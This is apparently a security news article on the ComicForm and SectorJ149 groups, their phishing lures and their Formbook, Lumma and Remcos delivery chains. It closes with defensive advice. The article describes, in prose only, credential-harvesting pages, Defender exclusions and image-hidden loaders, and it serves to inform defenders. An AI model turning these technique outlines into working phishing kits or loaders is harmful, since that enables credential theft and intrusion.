In recent months, cybersecurity experts have identified two distinct hacking groups, ComicForm and SectorJ149, orchestrating sophisticated phishing campaigns to deploy the Formbook malware across various regions, including Eurasia and South Korea.
ComicForm’s Operations in Eurasia
Since at least April 2025, a previously undocumented hacking group named ComicForm has been targeting organizations in Belarus, Kazakhstan, and Russia. Their primary focus has been on sectors such as industrial, financial, tourism, biotechnology, research, and trade.
The attack methodology involves sending phishing emails with subject lines like Waiting for the signed document, Invoice for Payment, or Reconciliation Act for Signature. These emails urge recipients to open an RAR archive containing a Windows executable disguised as a PDF document (e.g., Акт_сверки pdf 010.exe). The messages, written in Russian or English, originate from email addresses registered in the .ru, .by, and .kz top-level domains.
Upon execution, the obfuscated .NET loader launches a malicious DLL (MechMatrix Pro.dll), which subsequently runs another DLL named Montero.dll. This sequence serves as a dropper for the Formbook malware, while also creating a scheduled task and configuring Microsoft Defender exclusions to evade detection.
Notably, the binary contains Tumblr links pointing to harmless GIFs of comic superheroes like Batman, which inspired the group’s name. These images are not used in the attack but are embedded within the malware code.
Further analysis of ComicForm’s infrastructure indicates phishing emails were directed at an unspecified company in Kazakhstan in June 2025 and a Belarusian bank in April 2025. Additionally, phishing emails sent to Russian manufacturing companies from a Kazakhstan-based industrial company’s email address were detected and blocked as recently as July 25, 2025.
These emails prompt recipients to click on an embedded link to confirm their account and avoid a potential block. Clicking the link redirects users to a counterfeit landing page mimicking a domestic document management service login page, facilitating credential theft by transmitting entered information to an attacker-controlled domain via an HTTP POST request.
The phishing page’s JavaScript code extracts the email address from URL parameters, populates the input field with id=email, extracts the domain from the email address, and sets a screenshot of that domain’s website (via the screenshotapi[.]net API) as the background of the phishing page.
In the case of the Belarusian bank, a phishing email with an invoice-themed lure tricked users into entering their email addresses and phone numbers into a form, which were then captured and sent to an external domain.
F6, the cybersecurity company analyzing these attacks, stated, The group attacks Russian, Belarusian, and Kazakh companies from various sectors, and the use of English-language emails suggests that the attackers are also targeting organizations in other countries. The attackers employ both phishing emails distributing Formbook malware and phishing resources disguised as web services to harvest access credentials.
SectorJ149’s Activities in South Korea
Concurrently, the NSHC ThreatRecon Team disclosed details of a pro-Russian cybercrime group, SectorJ149 (also known as UAC-0050), targeting manufacturing, energy, and semiconductor sectors in South Korea.
In November 2024, SectorJ149 initiated spear-phishing emails targeting executives and employees with lures related to production facility purchases or quotation requests. These emails led to the execution of commodity malware families like Lumma Stealer, Formbook, and Remcos RAT through a Visual Basic Script distributed as a Microsoft cabinet (CAB) archive.
The Visual Basic Script executes a PowerShell command that contacts a Bitbucket or GitHub repository to fetch a JPG image file, which conceals a loader executable responsible for launching the final stealer and RAT payloads.
The PE Malware executed directly in memory is a loader-type malware that downloads additional malicious data disguised as a text file (.txt) through a URL included in the provided parameter values, decrypts it, and then generates and executes the PE Malware.
Historically, SectorJ149 primarily operated for financial gain. However, recent hacking activities targeting South Korean companies are believed to have a strong hacktivist nature, using hacking techniques to convey political, social, or ideological messages.
Implications and Recommendations
The activities of ComicForm and SectorJ149 underscore the evolving landscape of cyber threats, where attackers employ sophisticated phishing techniques and malware to target specific sectors and regions.
Organizations are advised to implement robust cybersecurity measures, including:
– Employee Training: Educate staff on recognizing phishing attempts and the importance of not opening suspicious emails or attachments.
– Email Filtering: Deploy advanced email filtering solutions to detect and block phishing emails before they reach the inbox.
– Endpoint Protection: Utilize comprehensive endpoint protection platforms that can detect and prevent malware execution.
– Regular Updates: Ensure all systems and software are up-to-date with the latest security patches to mitigate vulnerabilities.
– Incident Response Plan: Develop and regularly update an incident response plan to swiftly address potential breaches.
By adopting these measures, organizations can enhance their resilience against such targeted cyber threats.
